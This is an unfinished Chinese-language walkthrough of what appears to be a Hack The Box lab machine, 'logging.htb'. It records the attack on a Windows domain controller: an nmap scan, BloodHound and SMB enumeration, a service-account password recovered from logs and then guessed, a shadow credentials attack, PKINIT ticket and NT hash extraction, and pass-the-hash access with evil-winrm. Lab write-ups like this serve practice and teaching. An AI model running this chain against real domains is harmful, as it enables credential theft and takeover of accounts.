难度:中等

NMAP扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
┌──(root㉿kali)-[/home/kali]
└─# nmap -Pn -p- -T4 -A 10.129.56.228 
Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-12 05:03 -0400
Nmap scan report for 10.129.56.228
Host is up (0.41s latency).
Not shown: 65505 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-05-12 16:33:30Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: logging.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-05-12T16:35:39+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Not valid before: 2026-04-24T16:40:59
|_Not valid after:  2106-04-24T16:40:59
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: logging.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-05-12T16:35:38+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Not valid before: 2026-04-24T16:40:59
|_Not valid after:  2106-04-24T16:40:59
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: logging.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Not valid before: 2026-04-24T16:40:59
|_Not valid after:  2106-04-24T16:40:59
|_ssl-date: 2026-05-12T16:35:38+00:00; +6h59m59s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: logging.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Not valid before: 2026-04-24T16:40:59
|_Not valid after:  2106-04-24T16:40:59
|_ssl-date: 2026-05-12T16:35:38+00:00; +6h59m59s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8530/tcp  open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title.
8531/tcp  open  ssl/unknown
|_ssl-date: 2026-05-12T16:35:39+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.logging.htb
| Not valid before: 2026-04-24T15:49:07
|_Not valid after:  2027-04-24T15:49:07
| tls-alpn: 
|   h2
|_  http/1.1
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49687/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
49703/tcp open  msrpc         Microsoft Windows RPC
49753/tcp open  msrpc         Microsoft Windows RPC
49795/tcp open  msrpc         Microsoft Windows RPC
49801/tcp open  msrpc         Microsoft Windows RPC
61978/tcp open  msrpc         Microsoft Windows RPC
Device type: general purpose
Running: Microsoft Windows 2019
OS CPE: cpe:/o:microsoft:windows_server_2019
OS details: Microsoft Windows Server 2019
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s
| smb2-time: 
|   date: 2026-05-12T16:35:27
|_  start_date: N/A

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   471.69 ms 10.10.16.1
2   472.41 ms 10.129.56.228

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1930.30 seconds

注意到这里记录的DNS为logging.htbDC01.logging.htb

追加DNS记录

1
echo "10.129.56.228 logging.htb DC01.logging.htb" >> /etc/hosts

信息收集

注意到题干中给了初始用户账号和密码

image.png

初始账户:wallace.everette
密码:Welcome2026@

bloodhound

使用bloodhound来进行域绘图

1
bloodhound-python -dc 'DC01.logging.htb' -d 'logging.htb' -u 'wallace.everette' -p 'Welcome2026@' -ns 10.129.56.228 --zip -c All

smb

使用smb收集信息

1
nxc smb logging.htb -u 'wallace.everette' -p 'Welcome2026@' -M spider_plus

里面有些日志文件

1
cat /root/.nxc/modules/nxc_spider_plus/10.129.56.228.json

下载下来

1
2
3
4
smbclient //logging.htb/Logs \
    -U 'LOGGING/wallace.everette%Welcome2026@' \
    -c 'recurse ON; prompt OFF; mget *'

image.png

注意到账户密码
账户:svc_recovery
密码:Em3rg3ncyPa$$2025

使用smb走一遍,发现走不通
image.png

此时就需要查询Kerberos

1
2
3
anxc smb logging.htb --generate-krb5-file ./krb5.conf
export KRB5_CONFIG=./krb5.conf
sudo ntpdate -u logging.htb&&getTGT.py 'LOGGING.HTB/svc_recovery:Em3rg3ncyPa$$2025'

image.png

改变一下密钥试试 Em3rg3ncyPa$$2026

1
sudo ntpdate -u logging.htb&&getTGT.py 'LOGGING.HTB/svc_recovery:Em3rg3ncyPa$$2026'

image.png

成功

image.png

横向渗透与纵向渗透

通过对SVC_RECOVERT和MSA_HEALTH的分析可知,我们现在可以,我们现在可以穿到MSA_HEALTH账户上去了
image.png

通过注册恶意的密钥凭证实现认证

1
2
ntpdate -u logging.htb && bloodyAD --host dc01.logging.htb --dc-ip 10.129.56.228 -d logging.htb -u 'svc_recovery' -k add shadowCredentials 'MSA_HEALTH$'

然后使用gettgtpkinit提取出来key

1
python3 ~/domain/PKINITtools/gettgtpkinit.py -cert-pem sVLcIp9Y_cert.pem -key-pem sVLcIp9Y_priv.pem 'logging.htb/MSA_HEALTH$' sVLcIp9Y.ccache -dc-ip 10.129.56.228

使用getnthash提取hash

1
2
ntpdate -u 10.129.56.228&&python3 ~/domain/PKINITtools/getnthash.py 'logging.htb/MSA_HEALTH$' -key 6345cbc4a8edbab28cdee62301f1cbe93cb376eefdd0c102529ab1100a513e8a -dc-ip 10.129.56.228

连接进入

1
evil-winrm -i dc01.logging.htb -u 'msa_health$' -H 603fc24ee01a9409f83c9d1d701485c5

发现存在用户toby.brynleigh
image.png
且能直接连上adminstrators
image.png

后面不会做了…先放着吧